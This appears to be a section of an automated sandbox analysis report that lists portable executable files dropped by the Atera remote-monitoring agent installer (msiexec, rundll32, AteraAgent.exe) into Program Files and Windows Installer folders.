                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E58.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E58.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CA1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI46E3.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 442ada.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI31B4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAB51.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI31B4.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBDF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAC6B.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI46E3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA9D9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4D50.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6CA1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4BA8.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 442ad7.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77D8.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BC1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 442adb.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2E58.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\IdleTimeFinder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7BC1.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
